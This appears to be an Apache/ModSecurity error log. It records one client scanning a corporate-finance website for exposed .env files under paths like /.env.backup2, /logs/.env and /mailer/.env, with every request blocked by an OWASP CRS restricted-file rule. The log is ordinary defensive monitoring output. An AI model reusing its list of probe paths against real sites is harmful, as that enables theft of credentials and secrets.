[Mon May 11 16:26:47.709051 2026] [security2:error] [pid 1411055:tid 1411073] [client 18.180.54.2:39712] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.backup1"] [unique_id "agHnJ0WKUxpmnkK7zHx8NQAAARA"]
[Mon May 11 16:26:47.760622 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:39720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/exapi/.env"] [unique_id "agHnJw-Qm4vhlWBPlMi6RQAAAAc"]
[Mon May 11 16:26:47.760837 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:39720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/exapi/.env"] [unique_id "agHnJw-Qm4vhlWBPlMi6RQAAAAc"]
[Mon May 11 16:26:47.761336 2026] [core:error] [pid 1411099:tid 1411108] [client 18.180.54.2:39720] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:47.761491 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:39720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/exapi/.env"] [unique_id "agHnJw-Qm4vhlWBPlMi6RQAAAAc"]
[Mon May 11 16:26:48.433996 2026] [security2:error] [pid 1412074:tid 1412099] [client 18.180.54.2:39736] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.backup2"] [unique_id "agHnKDJnyuKVXoStDha1KAAAAFc"]
[Mon May 11 16:26:48.434247 2026] [security2:error] [pid 1412074:tid 1412099] [client 18.180.54.2:39736] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.backup2"] [unique_id "agHnKDJnyuKVXoStDha1KAAAAFc"]
[Mon May 11 16:26:48.434743 2026] [core:error] [pid 1412074:tid 1412099] [client 18.180.54.2:39736] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:48.434898 2026] [security2:error] [pid 1412074:tid 1412099] [client 18.180.54.2:39736] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.backup2"] [unique_id "agHnKDJnyuKVXoStDha1KAAAAFc"]
[Mon May 11 16:26:48.468864 2026] [security2:error] [pid 1411055:tid 1411069] [client 18.180.54.2:35734] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/sitemaps/.env"] [unique_id "agHnKEWKUxpmnkK7zHx8NgAAAQw"]
[Mon May 11 16:26:48.469092 2026] [security2:error] [pid 1411055:tid 1411069] [client 18.180.54.2:35734] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/sitemaps/.env"] [unique_id "agHnKEWKUxpmnkK7zHx8NgAAAQw"]
[Mon May 11 16:26:48.469583 2026] [core:error] [pid 1411055:tid 1411069] [client 18.180.54.2:35734] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:48.469746 2026] [security2:error] [pid 1411055:tid 1411069] [client 18.180.54.2:35734] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/sitemaps/.env"] [unique_id "agHnKEWKUxpmnkK7zHx8NgAAAQw"]
[Mon May 11 16:26:49.141136 2026] [security2:error] [pid 1416109:tid 1416143] [client 18.180.54.2:35744] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /logs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/logs/.env"] [unique_id "agHnKVV4kyjgo4bQBUhUjAAAAM0"]
[Mon May 11 16:26:49.141378 2026] [security2:error] [pid 1416109:tid 1416143] [client 18.180.54.2:35744] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/logs/.env"] [unique_id "agHnKVV4kyjgo4bQBUhUjAAAAM0"]
[Mon May 11 16:26:49.141869 2026] [core:error] [pid 1416109:tid 1416143] [client 18.180.54.2:35744] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:49.142024 2026] [security2:error] [pid 1416109:tid 1416143] [client 18.180.54.2:35744] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/logs/.env"] [unique_id "agHnKVV4kyjgo4bQBUhUjAAAAM0"]
[Mon May 11 16:26:49.200811 2026] [security2:error] [pid 1412074:tid 1412100] [client 18.180.54.2:35750] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.backup1"] [unique_id "agHnKTJnyuKVXoStDha1KgAAAFg"]
[Mon May 11 16:26:49.201039 2026] [security2:error] [pid 1412074:tid 1412100] [client 18.180.54.2:35750] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.backup1"] [unique_id "agHnKTJnyuKVXoStDha1KgAAAFg"]
[Mon May 11 16:26:49.201578 2026] [core:error] [pid 1412074:tid 1412100] [client 18.180.54.2:35750] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:49.201751 2026] [security2:error] [pid 1412074:tid 1412100] [client 18.180.54.2:35750] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.backup1"] [unique_id "agHnKTJnyuKVXoStDha1KgAAAFg"]
[Mon May 11 16:26:49.866568 2026] [security2:error] [pid 1411201:tid 1411266] [client 18.180.54.2:35752] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cache/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/cache/.env"] [unique_id "agHnKfy_GXSWIKeli0vyhgAAAJU"]
[Mon May 11 16:26:49.866797 2026] [security2:error] [pid 1411201:tid 1411266] [client 18.180.54.2:35752] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/cache/.env"] [unique_id "agHnKfy_GXSWIKeli0vyhgAAAJU"]
[Mon May 11 16:26:49.867335 2026] [core:error] [pid 1411201:tid 1411266] [client 18.180.54.2:35752] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:49.867492 2026] [security2:error] [pid 1411201:tid 1411266] [client 18.180.54.2:35752] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/cache/.env"] [unique_id "agHnKfy_GXSWIKeli0vyhgAAAJU"]
[Mon May 11 16:26:49.907473 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:35760] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.backup2"] [unique_id "agHnKVV4kyjgo4bQBUhUkAAAAMo"]
[Mon May 11 16:26:49.907655 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:35760] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.backup2"] [unique_id "agHnKVV4kyjgo4bQBUhUkAAAAMo"]
[Mon May 11 16:26:49.908109 2026] [core:error] [pid 1416109:tid 1416140] [client 18.180.54.2:35760] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:49.908301 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:35760] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.backup2"] [unique_id "agHnKVV4kyjgo4bQBUhUkAAAAMo"]
[Mon May 11 16:26:50.581891 2026] [security2:error] [pid 1411055:tid 1411061] [client 18.180.54.2:35772] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/mailer/.env"] [unique_id "agHnKkWKUxpmnkK7zHx8OQAAAQQ"]
[Mon May 11 16:26:50.582129 2026] [security2:error] [pid 1411055:tid 1411061] [client 18.180.54.2:35772] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/mailer/.env"] [unique_id "agHnKkWKUxpmnkK7zHx8OQAAAQQ"]
[Mon May 11 16:26:50.582637 2026] [core:error] [pid 1411055:tid 1411061] [client 18.180.54.2:35772] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:50.582816 2026] [security2:error] [pid 1411055:tid 1411061] [client 18.180.54.2:35772] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/mailer/.env"] [unique_id "agHnKkWKUxpmnkK7zHx8OQAAAQQ"]
[Mon May 11 16:26:50.631539 2026] [security2:error] [pid 1411099:tid 1411106] [client 18.180.54.2:35784] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /logs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/logs/.env"] [unique_id "agHnKg-Qm4vhlWBPlMi6SgAAAAU"]
[Mon May 11 16:26:50.631767 2026] [security2:error] [pid 1411099:tid 1411106] [client 18.180.54.2:35784] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/logs/.env"] [unique_id "agHnKg-Qm4vhlWBPlMi6SgAAAAU"]
[Mon May 11 16:26:50.632659 2026] [core:error] [pid 1411099:tid 1411106] [client 18.180.54.2:35784] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:50.632908 2026] [security2:error] [pid 1411099:tid 1411106] [client 18.180.54.2:35784] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/logs/.env"] [unique_id "agHnKg-Qm4vhlWBPlMi6SgAAAAU"]
[Mon May 11 16:26:51.273978 2026] [security2:error] [pid 1411055:tid 1411074] [client 18.180.54.2:35792] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/mail/.env"] [unique_id "agHnK0WKUxpmnkK7zHx8OgAAARE"]
[Mon May 11 16:26:51.274222 2026] [security2:error] [pid 1411055:tid 1411074] [client 18.180.54.2:35792] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/mail/.env"] [unique_id "agHnK0WKUxpmnkK7zHx8OgAAARE"]
[Mon May 11 16:26:51.274691 2026] [core:error] [pid 1411055:tid 1411074] [client 18.180.54.2:35792] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:51.274840 2026] [security2:error] [pid 1411055:tid 1411074] [client 18.180.54.2:35792] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/mail/.env"] [unique_id "agHnK0WKUxpmnkK7zHx8OgAAARE"]
[Mon May 11 16:26:51.376892 2026] [security2:error] [pid 1416109:tid 1416133] [client 18.180.54.2:35798] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cache/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cache/.env"] [unique_id "agHnK1V4kyjgo4bQBUhUlgAAAMM"]
[Mon May 11 16:26:51.377136 2026] [security2:error] [pid 1416109:tid 1416133] [client 18.180.54.2:35798] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cache/.env"] [unique_id "agHnK1V4kyjgo4bQBUhUlgAAAMM"]
[Mon May 11 16:26:51.377626 2026] [core:error] [pid 1416109:tid 1416133] [client 18.180.54.2:35798] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:51.377800 2026] [security2:error] [pid 1416109:tid 1416133] [client 18.180.54.2:35798] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cache/.env"] [unique_id "agHnK1V4kyjgo4bQBUhUlgAAAMM"]
[Mon May 11 16:26:52.047031 2026] [security2:error] [pid 1411055:tid 1411066] [client 18.180.54.2:35814] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /email/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/email/.env"] [unique_id "agHnLEWKUxpmnkK7zHx8OwAAAQk"]
